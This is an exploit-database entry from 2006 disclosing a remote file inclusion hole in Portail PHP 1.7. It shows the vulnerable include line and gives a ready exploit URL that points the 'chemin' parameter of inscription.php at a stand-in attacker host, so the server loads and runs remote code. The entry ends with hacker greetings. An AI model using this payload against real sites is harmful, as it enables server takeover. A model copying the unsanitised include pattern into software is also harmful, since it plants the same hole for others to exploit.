id: 612
date: 07/26/2006
title: Portail PHP <= 1.7 (chemin) Remote Inclusion Vulnerability
author: xoron
cves: 

==========================================================
Portail PHP <= 1.7 (chemin) Remote Inclusion Vulnerability
==========================================================


Portail PHP v1.7 <- (chemin) Remote Inclusion Vulnerability

#Author: xoron

#script: Portail PHP

#Class : Remote

#cont@ct: x0r0n[at]hotmail[dot]com

#CODE:    include ("$chemin/include/config.php")

#Exploit:
http://www.site.com/[path]/mod_membre/inscription.php?chemin=http://evil_scripts?


#Greetz: DJR, x-mastER, R3D4C!D and all cyber-warrior users.




#  0day.today [2023-03-26]  #